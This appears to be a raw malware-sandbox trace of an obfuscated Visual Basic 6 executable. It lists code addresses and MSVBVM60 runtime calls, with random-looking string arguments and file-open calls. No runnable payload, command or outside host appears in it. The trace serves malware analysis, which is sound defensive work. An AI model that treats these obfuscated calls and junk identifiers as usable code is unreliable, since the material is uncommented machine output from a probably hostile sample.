0x0040ec5f
0x0040ec68
0x0040ec6a
0x0040ec71
0x0040ec78
0x0040ec7a
0x0040ec7f
0x0040ec7f
0x0040ec85
0x0040ec8c
0x0040ec91
0x0040ec96
0x0040ec97
0x0040eca4
0x0040eca9
0x0040ecaa
0x0040ecaf
0x0040ecb6
0x0040ecbc
0x0040ecc9
0x0040ecce
0x0040ecd5
0x0040ecd7
0x0040ecd9
0x0040ece0
0x0040ece7
0x0040ece9
0x0040ecf1
0x0040ecf1
0x0040ecf7
0x0040ecfe
0x0040ed07
0x0040ed17
0x0040ed1d
0x0040ed2b
0x0040ed31
0x0040ed3c
0x0040ed42
0x0040ed4a
0x0040ed98
0x0040ed9e
0x0040eda4
0x0040eda9
0x0040edb0
0x0040edba
0x0040edc4
0x0040edce
0x0040edde
0x0040ede5
0x0040ede6
0x0040ede8
0x0040ede9
0x0040edea
0x0040eded
0x0040edef
0x0040edf0
0x0040edf1
0x0040edf4
0x0040edf6
0x0040edf7
0x0040edf8
0x0040edfb
0x0040edfd
0x0040edfe
0x0040edff
0x0040ee02
0x0040ee07
0x0040ee0c
0x0040ee12
0x0040ee14
0x0040ee15
0x0040ee23
0x0040ee17
0x0040ee17
0x0040ee17
0x0040ee32
0x0040ee3f
0x0040ee46
0x0040ee47
0x0040ee49
0x0040ee4e
0x0040ee5a
0x0040ee5c
0x0040ee6f
0x0040ee7c
0x0040ee87
0x0040ee8d
0x0040ee8f
0x0040ee9c
0x0040eebe
0x0040ee9e
0x0040ee9e
0x0040eea3
0x0040eea8
0x0040eeab
0x0040eeb1
0x0040eeb6
0x0040eeb6
0x0040ee9c
0x0040eec5
0x0040eecc
0x0040eed6
0x0040eee6
0x0040eee7
0x0040eeef
0x0040eef0
0x0040eef5
0x0040eeff
0x0040ef0f
0x0040ef10
0x0040ef16
0x0040ef17
0x0040ef1c
0x0040ef29
0x0040ef30
0x0040ef31
0x0040ef33
0x0040ef38
0x0040ef3b
0x0040ef44
0x0040ef46
0x0040ef4d
0x0040ef54
0x0040ef59
0x0040ef5e
0x0040ef63
0x0040ef65
0x0040ef6a
0x0040ef6a
0x0040ef70
0x0040ef77
0x0040ef7c
0x0040ef81
0x0040ef88
0x0040ef89
0x0040ef8e
0x0040ef98
0x0040efa8
0x0040efa9
0x0040efaf
0x0040efb0
0x0040efb5
0x0040efc2
0x0040efd0
0x0040efd6
0x0040efdd
0x0040efeb
0x0040f008
0x0040efed
0x0040efed
0x0040eff2
0x0040eff7
0x0040effc
0x0040effc
0x0040f01a
0x0040f020
0x0040f02a
0x0040f034
0x0040f03e
0x0040f048
0x0040f052
0x0040f05c
0x0040f066
0x0040f070
0x0040f07a
0x0040f08e
0x0040f09b
0x0040f09c
0x0040f09d
0x0040f09e
0x0040f0a2
0x0040f0af
0x0040f0b0
0x0040f0b1
0x0040f0b2
0x0040f0b6
0x0040f0c3
0x0040f0c4
0x0040f0c5
0x0040f0c6
0x0040f0ca
0x0040f0d7
0x0040f0d8
0x0040f0d9
0x0040f0da
0x0040f0de
0x0040f0eb
0x0040f0ec
0x0040f0ed
0x0040f0ee
0x0040f0fd
0x0040f100
0x0040f102
0x0040f10f
0x0040f131
0x0040f111
0x0040f111
0x0040f113
0x0040f118
0x0040f11e
0x0040f124
0x0040f129
0x0040f129
0x0040f13e
0x0040f144
0x0040f151
0x0040f157
0x0040f161
0x0040f164
0x0040f171
0x0040f172
0x0040f173
0x0040f174
0x0040f175
0x0040f177
0x0040f17a
0x0040f185
0x0040f185
0x0040f18a
0x0040f191
0x0040f197
0x0040f1a8
0x0040f1ad
0x0040f1e2
0x0040f1e8
0x0040f1f5
0x0040f217
0x0040f1f7
0x0040f1f7
0x0040f1fc
0x0040f201
0x0040f204
0x0040f20a
0x0040f20f
0x0040f20f
0x0040f224
0x0040f229
0x0040f230
0x0040f23a
0x0040f250
0x0040f25b
0x0040f262
0x0040f263
0x0040f26e
0x0040f26f
0x0040f274
0x0040f27d
0x0040f284
0x0040f285
0x0040f287
0x0040f28c
0x0040f28f
0x0040f296
0x0040f2a0
0x0040f2aa
0x0040f2b0
0x0040f2b1
0x0040f2be
0x0040f2c3
0x0040f2c4
0x0040f2c9
0x0040f2d0
0x0040f2d6
0x0040f2e3
0x0040f2ee
0x0040f2f3
0x0040f2fc
0x0040f2fe
0x0040f305
0x0040f30c
0x0040f30e
0x0040f313
0x0040f313
0x0040f316
0x0040f31d
0x0040f327
0x0040f33d
0x0040f348
0x0040f34f
0x0040f350
0x0040f355
0x0040f35f
0x0040f36f
0x0040f370
0x0040f376
0x0040f377
0x0040f37c
0x0040f389
0x0040f390
0x0040f391
0x0040f393
0x0040f398
0x0040f3a4
0x0040f3aa
0x0040f3c0
0x0040f3c6
0x0040f3c8
0x0040f3d5
0x0040f3f7
0x0040f3d7
0x0040f3d7
0x0040f3dc
0x0040f3e1
0x0040f3e4
0x0040f3ea
0x0040f3ef
0x0040f3ef
0x0040f405
0x0040f422
0x0040f407
0x0040f407
0x0040f40c
0x0040f411
0x0040f416
0x0040f416
0x0040f434
0x0040f440
0x0040f446
0x0040f458
0x0040f45f
0x0040f473
0x0040f476
0x0040f478
0x0040f485
0x0040f4a7
0x0040f487
0x0040f487
0x0040f489
0x0040f48e
0x0040f494
0x0040f49a
0x0040f49f
0x0040f49f
0x0040f4b4
0x0040f4b4
0x0040f4b9
0x0040f4c0
0x0040f4ca
0x0040f4df
0x0040f515
0x0040f51b
0x0040f528
0x0040f54a
0x0040f52a
0x0040f52a
0x0040f52f
0x0040f534
0x0040f537
0x0040f53d
0x0040f542
0x0040f542
0x0040f557
0x0040f55c
0x0040f563
0x0040f56d
0x0040f577
0x0040f57d
0x0040f57e
0x0040f58b
0x0040f590
0x0040f591
0x0040f596
0x0040f59d
0x0040f5a3
0x0040f5b0
0x0040f5bb
0x0040f5c9
0x0040f5cf
0x0040f5dd
0x0040f5fa
0x0040f5df
0x0040f5df
0x0040f5e4
0x0040f5e9
0x0040f5ee
0x0040f5ee
0x0040f60c
0x0040f627
0x0040f62a
0x0040f62c
0x0040f639
0x0040f65b
0x0040f63b
0x0040f63b
0x0040f63d
0x0040f642
0x0040f648
0x0040f64e
0x0040f653
0x0040f653
0x0040f668
0x0040f67c
0x0040f67f
0x0040f681
0x0040f68e
0x0040f6b0
0x0040f690
0x0040f690
0x0040f692
0x0040f697
0x0040f69d
0x0040f6a3
0x0040f6a8
0x0040f6a8
0x0040f6bd
0x0040f6bd
0x0040f6c2
0x0040f6c9
0x0040f6d3
0x0040f6dd
0x0040f6e7
0x0040f6fd
0x0040f708
0x0040f709
0x0040f711
0x0040f718
0x0040f719
0x0040f71e
0x0040f728
0x0040f738
0x0040f739
0x0040f73f
0x0040f740
0x0040f745
0x0040f752
0x0040f759
0x0040f760
0x0040f761
0x0040f763
0x0040f768
0x0040f76b
0x0040f774
0x0040f77a
0x0040f781
0x0040f78b
0x0040f791
0x0040f79b
0x0040f7a5
0x0040f7af
0x0040f7b9
0x0040f7c3
0x0040f7c6
0x0040f7d3
0x0040f7d4
0x0040f7d5
0x0040f7d6
0x0040f7d7
0x0040f7da
0x0040f7e7
0x0040f7e8
0x0040f7e9
0x0040f7ea
0x0040f7ed
0x0040f7ee
0x0040f7fb
0x0040f7fc
0x0040f7fd
0x0040f7fe
0x0040f7ff
0x0040f801
0x0040f806
0x0040f809
0x0040f80e
0x0040f80e
0x0040f811
0x0040f818
0x0040f81d
0x0040f825
0x0040f827
0x0040f82e
0x0040f833
0x0040f838
0x0040f83a
0x0040f83c
0x0040f83c
0x0040f841
0x0040f848
0x0040f85c
0x0040f86c
0x0040f871
0x0040f8ba
0x0040f8c6
0x0040f8d2
0x0040f8d9
0x0040f8da
0x0040f8dc
0x0040f8e4
0x0040f8f2
0x0040f90f
0x0040f8f4
0x0040f8f4
0x0040f8f9
0x0040f8fe
0x0040f903
0x0040f903
0x0040f921
0x0040f93c
0x0040f93f
0x0040f941
0x0040f94e
0x0040f970
0x0040f950
0x0040f950
0x0040f952
0x0040f957
0x0040f95d
0x0040f963
0x0040f968
0x0040f968
0x0040f97d
0x0040f998
0x0040f99b
0x0040f99d
0x0040f9aa
0x0040f9cc
0x0040f9ac
0x0040f9ac
0x0040f9ae
0x0040f9b3
0x0040f9b9
0x0040f9bf
0x0040f9c4
0x0040f9c4
0x0040f9d9
0x0040f9df
0x0040f9f2
0x0040f9fd
0x0040fa02
0x0040fa09
0x0040fa0e
0x0040fa1c
0x0040fa28
0x0040fa32
0x0040fa37
0x0040fa3d
0x0040fa42
0x0040fa49
0x0040fa52
0x0040fa6f
0x0040fa80
0x0040fa97
0x0040fa9d
0x0040faaa
0x0040facc
0x0040faac
0x0040faac
0x0040fab1
0x0040fab6
0x0040fab9
0x0040fabf
0x0040fac4
0x0040fac4
0x0040fad9
0x0040fae2
0x0040fae5
0x0040faec
0x0040faf6
0x0040fb00
0x0040fb0a
0x0040fb1a
0x0040fb1b
0x0040fb21
0x0040fb22
0x0040fb27
0x0040fb2c
0x0040fb32
0x0040fb48
0x0040fb4e
0x0040fb50
0x0040fb5d
0x0040fb7f
0x0040fb5f
0x0040fb5f
0x0040fb64
0x0040fb69
0x0040fb6c
0x0040fb72
0x0040fb77
0x0040fb77
0x0040fb8d
0x0040fbaa
0x0040fb8f
0x0040fb8f
0x0040fb94
0x0040fb99
0x0040fb9e
0x0040fb9e
0x0040fbbc
0x0040fbc8
0x0040fbce
0x0040fbe0
0x0040fbe7
0x0040fbfb
0x0040fbfe
0x0040fc00
0x0040fc0d
0x0040fc2f
0x0040fc0f
0x0040fc0f
0x0040fc11
0x0040fc16
0x0040fc1c
0x0040fc22
0x0040fc27
0x0040fc27
0x0040fc3c
0x0040fc3c
0x0040fc41
0x0040fc48
0x0040fc4d
0x0040fc52
0x0040fc59
0x0040fc5b
0x0040fc62
0x0040fc69
0x0040fc6b
0x0040fc76
0x0040fc77
0x0040fc7c
0x0040fc7f
0x0040fc8c
0x0040fc8d
0x0040fc8e
0x0040fc8f
0x0040fc90
0x0040fc92
0x0040fc95
0x0040fca0
0x0040fca0
0x0040fca5
0x0040fcac
0x0040fcb6
0x0040fccc
0x0040fcd7
0x0040fcde
0x0040fcdf
0x0040fce4
0x0040fcee
0x0040fcfe
0x0040fcff
0x0040fd05
0x0040fd06
0x0040fd0b
0x0040fd18
0x0040fd1f
0x0040fd20
0x0040fd22
0x0040fd33
0x0040fd39
0x0040fd40
0x0040fd4e
0x0040fd6b
0x0040fd50
0x0040fd50
0x0040fd55
0x0040fd5a
0x0040fd5f
0x0040fd5f
0x0040fd7d
0x0040fd83
0x0040fd8d
0x0040fda6
0x0040fdb3
0x0040fdb4
0x0040fdb5
0x0040fdb6
0x0040fdc5
0x0040fdc8
0x0040fdca
0x0040fdd7
0x0040fdf9
0x0040fdd9
0x0040fdd9
0x0040fddb
0x0040fde0
0x0040fde6
0x0040fdec
0x0040fdf1
0x0040fdf1
0x0040fe06
0x0040fe0c
0x0040fe13
0x0040fe1f
0x0040fe20
0x0040fe20
0x0040fe25
0x0040fe37
0x0040fe47
0x0040fe4c
0x0040fe61
0x0040fe9e
0x0040fea4
0x0040feb1
0x0040fed3
0x0040feb3
0x0040feb3
0x0040feb8
0x0040febd
0x0040fec0
0x0040fec6
0x0040fecb
0x0040fecb
0x0040fee0
0x0040fee7
0x0040fee8
0x0040feee
0x0040feef
0x0040fef1
0x0040fef9
0x0040ff00
0x0040ff05
0x0040ff0e
0x0040ff14
0x0040ff1b
0x0040ff29
0x0040ff46
0x0040ff2b
0x0040ff2b
0x0040ff30
0x0040ff35
0x0040ff3a
0x0040ff3a
0x0040ff58
0x0040ff73
0x0040ff76
0x0040ff78
0x0040ff85
0x0040ffa7
0x0040ff87
0x0040ff87
0x0040ff89
0x0040ff8e
0x0040ff94
0x0040ff9a
0x0040ff9f
0x0040ff9f
0x0040ffb4
0x0040ffd1
0x0040ffd4
0x0040ffd6
0x0040ffe3
0x00410005
0x0040ffe5
0x0040ffe5
0x0040ffe7
0x0040ffec
0x0040fff2
0x0040fff8
0x0040fffd
0x0040fffd
0x00410013
0x00410020
0x00410020
0x00410025
0x00410033
0x00410050
0x00410035
0x00410035
0x0041003a
0x0041003f
0x00410044
0x00410044
0x00410062
0x0041007d
0x00410080
0x00410082
0x0041008f
0x004100b1
0x00410091
0x00410091
0x00410093
0x00410098
0x0041009e
0x004100a4
0x004100a9
0x004100a9
0x004100be
0x004100d9
0x004100df
0x004100e1
0x004100ee
0x00410113
0x004100f0
0x004100f0
0x004100f5
0x004100fa
0x00410100
0x00410106
0x0041010b
0x0041010b
0x00410120
0x00410126
0x00410139
0x00410144
0x00410149
0x00410150
0x0041015a
0x00410164
0x0041016a
0x0041016b
0x0041016d
0x0041017a
0x0041017f
0x00410180
0x00410185
0x0041018c
0x00410192
0x0041019f
0x004101aa
0x004101b8
0x004101ba
0x004101c1
0x004101c8
0x004101ca
0x004101d5
0x004101d6
0x004101db
0x004101de
0x004101eb
0x004101ec
0x004101ed
0x004101ee
0x004101ef
0x004101f1
0x004101f4
0x004101ff
0x004101ff
0x00410204
0x0041020b
0x00410214
0x00410223
0x00410234
0x0041027b
0x00410281
0x0041028e
0x004102b0
0x00410290
0x00410290
0x00410295
0x0041029a
0x0041029d
0x004102a3
0x004102a8
0x004102a8
0x004102bd
0x004102c2
0x004102cc
0x004102d2
0x004102dc
0x004102e2
0x004102e3
0x004102ec
0x004102f3
0x004102fd
0x00410303
0x0041030d
0x00410313
0x00410314
0x0041031d
0x00410324
0x0041032b
0x00410330
0x0041033b
0x0041033c
0x00410341
0x00410348
0x00410358
0x00410359
0x0041035f
0x00410360
0x00410365
0x00410372
0x00410380
0x00410386
0x0041038d
0x0041039b
0x004103b8
0x0041039d
0x0041039d
0x004103a2
0x004103a7
0x004103ac
0x004103ac
0x004103ca
0x004103e5
0x004103e8
0x004103ea
0x004103f7
0x00410419
0x004103f9
0x004103f9
0x004103fb
0x00410400
0x00410406
0x0041040c
0x00410411
0x00410411
0x00410426
0x0041044b
0x0041044e
0x00410450
0x0041045d
0x0041047f
0x0041045f
0x0041045f
0x00410461
0x00410466
0x0041046c
0x00410472
0x00410477
0x00410477
0x0041048c
0x00410492
0x004104a2
0x004104ad
0x004104ad
0x004104b2
0x004104bb
0x004104c0
0x004104d6
0x004104dc
0x004104de
0x004104eb
0x0041050d
0x004104ed
0x004104ed
0x004104f2
0x004104f7
0x004104fa
0x00410500
0x00410505
0x00410505
0x00410529
0x0041052f
0x00410531
0x0041053e
0x00410560
0x00410540
0x00410540
0x00410545
0x0041054a
0x0041054d
0x00410553
0x00410558
0x00410558
0x00410567
0x0041056e
0x00410575
0x0041057c
0x0041058f
0x00410594
0x00410594
0x0041059b
0x004105a5
0x004105c1
0x004105cb
0x004105d0
0x004105df
0x004105e5
0x004105ec
0x004105f6
0x00410600
0x00410606
0x00410607
0x00410609
0x00410616
0x0041061b
0x0041061c
0x00410621
0x00410628
0x0041062e
0x0041063b
0x00410646
0x00410654
0x00410656
0x0041065d
0x00410664
0x00410666
0x00410671
0x00410672
0x00410677
0x0041067a
0x00410687
0x00410688
0x00410689
0x0041068a
0x0041068b
0x0041068d
0x00410690
0x0041069b
0x0041069b
0x004106a0
0x004106a7
0x004106b1
0x004106bb
0x004106bd
0x004106c3
0x004106c4
0x004106ce
0x004106d9
0x004106de
0x004106e5
0x004106e7
0x004106e9
0x004106eb
0x004106f0
0x004106f5
0x004106fa
0x00410701
0x0041070b
0x00410718
0x00410719
0x0041071f
0x00410720
0x0041072a
0x00000000
0x00000000
0x0041072c
0x00410731
0x00410738
0x00410742
0x00410742
0x00410743
0x00410751
0x00410754
0x00410757
0x00410758
0x00000000
0x0041031f
0x00000000
0x004102ee
0x0041075a
0x00410761
0x00410762
0x004107ca
0x004107d2
0x004107da
0x004107e2
0x004107ea
0x004107f2
0x004107fa
0x004107fb
0x004107fd
0x00410805
0x0041080d
0x00410815
0x0041081d
0x00410822
0x00410825
0x00410826
0x00410828
0x00410830
0x0041083b
0x00410846
0x00410851
0x0041085c
0x00410861

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 0040EAB7
#588.MSVBVM60(00000002,00000001,00000000,?,?,?,?,00401486), ref: 0040EB01
__vbaNew2.MSVBVM60(0040DA28,0041331C,00000002,00000001,00000000,?,?,?,?,00401486), ref: 0040EB32
__vbaLateMemCallLd.MSVBVM60(?,?,UULjaijLMUuw190,00000000), ref: 0040EB6F
__vbaObjVar.MSVBVM60(00000000,?,?,?,00401486), ref: 0040EB78
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,00401486), ref: 0040EB85
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,0000000C), ref: 0040EBC0
__vbaFreeObj.MSVBVM60(00000000,?,0040DA18,0000000C), ref: 0040EBDA
__vbaFreeVar.MSVBVM60(00000000,?,0040DA18,0000000C), ref: 0040EBE5
__vbaVarDup.MSVBVM60 ref: 0040EC11
#591.MSVBVM60(?), ref: 0040EC1D
__vbaStrMove.MSVBVM60(?), ref: 0040EC2A
__vbaStrCmp.MSVBVM60(String,00000000,?), ref: 0040EC35
__vbaFreeStr.MSVBVM60(String,00000000,?), ref: 0040EC4F
__vbaFreeVar.MSVBVM60(String,00000000,?), ref: 0040EC5A
#569.MSVBVM60(00000061,String,00000000,?), ref: 0040EC7A
__vbaI4Str.MSVBVM60(0040DAD4,String,00000000,?), ref: 0040EC91
#697.MSVBVM60(00000000,0040DAD4,String,00000000,?), ref: 0040EC97
__vbaStrMove.MSVBVM60(00000000,0040DAD4,String,00000000,?), ref: 0040ECA4
__vbaStrCmp.MSVBVM60(0040DAE0,00000000,00000000,0040DAD4,String,00000000,?), ref: 0040ECAF
__vbaFreeStr.MSVBVM60(0040DAE0,00000000,00000000,0040DAD4,String,00000000,?), ref: 0040ECC9
#571.MSVBVM60(0000005E,0040DAE0,00000000,00000000,0040DAD4,String,00000000,?), ref: 0040ECE9
__vbaStrCopy.MSVBVM60 ref: 0040ED31
__vbaFreeStr.MSVBVM60 ref: 0040EDA4
#675.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 0040EE02
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 0040EE07
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 0040EE49
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D650,00000084), ref: 0040EEB1
#607.MSVBVM60(?,00000001,00000002), ref: 0040EEF0
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0040EF17
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?), ref: 0040EF33
__vbaInStr.MSVBVM60(00000000,KLARLG,moderskabernes,FFEA4050,?,?,?,?,?,00401486), ref: 0040EF65
__vbaI4Str.MSVBVM60(0040DAD4,?,?,?,?,?,00401486), ref: 0040EF7C
#698.MSVBVM60(?,00000000,0040DAD4,?,?,?,?,?,00401486), ref: 0040EF89
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0040EFB0
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0040EFC2
__vbaNew2.MSVBVM60(0040DA28,0041331C,00008008,?), ref: 0040EFF7
__vbaChkstk.MSVBVM60(?), ref: 0040F08E
__vbaChkstk.MSVBVM60(?), ref: 0040F0A2
__vbaChkstk.MSVBVM60(?), ref: 0040F0B6
__vbaChkstk.MSVBVM60(?), ref: 0040F0CA
__vbaChkstk.MSVBVM60(?), ref: 0040F0DE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,00000044), ref: 0040F124
__vbaChkstk.MSVBVM60(00000000,?,0040DA18,00000044), ref: 0040F164
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 0040F17A
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0040F185
__vbaStrCopy.MSVBVM60(00008008,?), ref: 0040F1A8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D680,000006F8), ref: 0040F20A
__vbaFreeStr.MSVBVM60(00000000,?,0040D680,000006F8), ref: 0040F224
__vbaVarDup.MSVBVM60(00000000,?,0040D680,000006F8), ref: 0040F250
#687.MSVBVM60(?,?), ref: 0040F263
__vbaDateVar.MSVBVM60(?,?,?), ref: 0040F26F
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0040F287
#572.MSVBVM60(00000002), ref: 0040F2B1
__vbaStrMove.MSVBVM60(00000002), ref: 0040F2BE
__vbaStrCmp.MSVBVM60(0040DB94,00000000,00000002), ref: 0040F2C9
__vbaFreeStr.MSVBVM60(0040DB94,00000000,00000002), ref: 0040F2E3
__vbaFreeVar.MSVBVM60(0040DB94,00000000,00000002), ref: 0040F2EE
#568.MSVBVM60(00000014,0040DB94,00000000,00000002), ref: 0040F30E
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040DB94,00000000,00000002), ref: 0040F33D
#547.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DB94), ref: 0040F350
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,00000002), ref: 0040F377
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?,?,?,?,00000002), ref: 0040F393
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D650,00000160), ref: 0040F3EA
__vbaNew2.MSVBVM60(0040DA28,0041331C), ref: 0040F411
__vbaObjSet.MSVBVM60(?,?,Moaria), ref: 0040F45F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,00000040), ref: 0040F49A
__vbaFreeObj.MSVBVM60(00000000,?,0040DA18,00000040), ref: 0040F4B4
__vbaStrCopy.MSVBVM60 ref: 0040F4DF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D680,000006FC), ref: 0040F53D
__vbaFreeStr.MSVBVM60(00000000,?,0040D680,000006FC), ref: 0040F557
#574.MSVBVM60(00000002), ref: 0040F57E
__vbaStrMove.MSVBVM60(00000002), ref: 0040F58B
__vbaStrCmp.MSVBVM60(0040DBFC,00000000,00000002), ref: 0040F596
__vbaFreeStr.MSVBVM60(0040DBFC,00000000,00000002), ref: 0040F5B0
__vbaFreeVar.MSVBVM60(0040DBFC,00000000,00000002), ref: 0040F5BB
__vbaNew2.MSVBVM60(0040DA28,0041331C,0040DBFC,00000000,00000002), ref: 0040F5E9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DA18,0000001C), ref: 0040F64E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000050), ref: 0040F6A3
__vbaFreeObj.MSVBVM60(00000000,?,0040DA78,00000050), ref: 0040F6BD
__vbaVarDup.MSVBVM60(0040DBFC,00000000,00000002), ref: 0040F6FD
#632.MSVBVM60(?,00000002,00000002,00000002,0040DBFC,00000000,00000002), ref: 0040F719
__vbaVarTstNe.MSVBVM60(00008008,?,?,00000002,00000002,00000002,0040DBFC,00000000,00000002), ref: 0040F740
__vbaFreeVarList.MSVBVM60(00000003,00000002,00000002,?,00008008,?,?,00000002,00000002,00000002,0040DBFC,00000000,00000002), ref: 0040F763
__vbaChkstk.MSVBVM60 ref: 0040F7C6
__vbaChkstk.MSVBVM60 ref: 0040F7DA
__vbaChkstk.MSVBVM60 ref: 0040F7EE
__vbaLateMemCall.MSVBVM60(?,R8RKPuezMDYUe6qnGrDitDuDZFS86,00000003), ref: 0040F809
__vbaLenBstr.MSVBVM60(0040DCAC,?,?,?,?,?,?,?,?,00000000,0040DAD4), ref: 0040F81D
__vbaFileOpen.MSVBVM60(00000020,000000FF,00000090,Hemathidrosis8,0040DCAC,?,?,?,?,?,?,?,?,00000000,0040DAD4), ref: 0040F83C
__vbaStrCopy.MSVBVM60 ref: 0040F85C
__vbaStrCopy.MSVBVM60 ref: 0040F86C
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040F8DC
__vbaNew2.MSVBVM60(0040DA28,0041331C,?,?,0040DCAC,?,?,?,?,?,?,?,?,00000000,0040DAD4), ref: 0040F8FE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,00000014), ref: 0040F963
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA38,00000058), ref: 0040F9BF
__vbaStrMove.MSVBVM60(00000000,?,0040DA38,00000058), ref: 0040F9F2
__vbaFreeObj.MSVBVM60(00000000,?,0040DA38,00000058), ref: 0040F9FD
#554.MSVBVM60(00000000,?,0040DA38,00000058), ref: 0040FA09
#612.MSVBVM60(?), ref: 0040FA1C
__vbaStrVarMove.MSVBVM60(?,?), ref: 0040FA28
__vbaStrMove.MSVBVM60(?,?), ref: 0040FA32
__vbaFreeVar.MSVBVM60(?,?), ref: 0040FA3D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D680,00000700,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FABF
__vbaVarTstNe.MSVBVM60(00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FB22
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D650,00000160,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FB72
__vbaNew2.MSVBVM60(0040DA28,0041331C,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FB99
__vbaObjSet.MSVBVM60(?,?,Skamsttter8,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FBE7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DA18,00000040,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FC22
__vbaFreeObj.MSVBVM60(?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FC3C
__vbaStrCmp.MSVBVM60(0040DD60,0040DD60,00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FC52
#716.MSVBVM60(?,isogamous,00000000,0040DD60,0040DD60,00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FC77
__vbaChkstk.MSVBVM60(?,isogamous,00000000,0040DD60,0040DD60,00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FC7F
__vbaLateIdSt.MSVBVM60(?,00000000,?,isogamous,00000000,0040DD60,0040DD60,00008002,00000008,?,00002F1F,?,?,Circuted,?,?), ref: 0040FC95
__vbaFreeVar.MSVBVM60(?,00000000,?,isogamous,00000000,0040DD60,0040DD60,00008002,00000008,?,00002F1F,?,?,Circuted,?,?), ref: 0040FCA0
__vbaVarDup.MSVBVM60(0040DD60,0040DD60,00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FCCC
#544.MSVBVM60(?,?,0040DD60,0040DD60,00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FCDF
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,0040DD60,0040DD60,00008002,00000008,?,00002F1F,?,?,Circuted,?,?,?), ref: 0040FD06
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,0040DD60,0040DD60,00008002,00000008,?,00002F1F,?,?,Circuted), ref: 0040FD22
__vbaNew2.MSVBVM60(0040DA28,0041331C,?,?,?,?,?,0040DCAC,?,?,?,?,?,?,?,?), ref: 0040FD5A
__vbaChkstk.MSVBVM60(00000590,?), ref: 0040FDA6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,00000034), ref: 0040FDEC
__vbaObjSet.MSVBVM60(?,?), ref: 0040FE20
__vbaStrCopy.MSVBVM60(?,?,?,?,?,0040DCAC,?,?,?,?,?,?,?,?,00000000,0040DAD4), ref: 0040FE37
__vbaStrCopy.MSVBVM60(?,?,?,?,?,0040DCAC,?,?,?,?,?,?,?,?,00000000,0040DAD4), ref: 0040FE47
__vbaStrCopy.MSVBVM60(?,?), ref: 0040FE61
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D680,00000704), ref: 0040FEC6
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040FEF1
#516.MSVBVM60(0040DAE0,?,?,?,?,?,?,?,?,?,0040DCAC), ref: 0040FF05
__vbaNew2.MSVBVM60(0040DA28,0041331C,0040DAE0,?,?,?,?,?,?,?,?,?,0040DCAC), ref: 0040FF35
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,0000001C), ref: 0040FF9A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000064), ref: 0040FFF8
__vbaFreeObj.MSVBVM60(00000000,?,0040DA78,00000064), ref: 00410020
__vbaNew2.MSVBVM60(0040DA28,0041331C,0040DAE0,?,?,?,?,?,?,?,?,?,0040DCAC), ref: 0041003F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,00000014), ref: 004100A4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA38,00000130), ref: 00410106
__vbaStrMove.MSVBVM60(00000000,?,0040DA38,00000130), ref: 00410139
__vbaFreeObj.MSVBVM60(00000000,?,0040DA38,00000130), ref: 00410144
#606.MSVBVM60(00000001,00000002), ref: 0041016D
__vbaStrMove.MSVBVM60(00000001,00000002), ref: 0041017A
__vbaStrCmp.MSVBVM60(0040DB04,00000000,00000001,00000002), ref: 00410185
__vbaFreeStr.MSVBVM60(0040DB04,00000000,00000001,00000002), ref: 0041019F
__vbaFreeVar.MSVBVM60(0040DB04,00000000,00000001,00000002), ref: 004101AA
#716.MSVBVM60(00000002,Outpushed1,00000000,0040DB04,00000000,00000001,00000002), ref: 004101D6
__vbaChkstk.MSVBVM60(00000002,Outpushed1,00000000,0040DB04,00000000,00000001,00000002), ref: 004101DE
__vbaLateIdSt.MSVBVM60(?,00000000,00000002,Outpushed1,00000000,0040DB04,00000000,00000001,00000002), ref: 004101F4
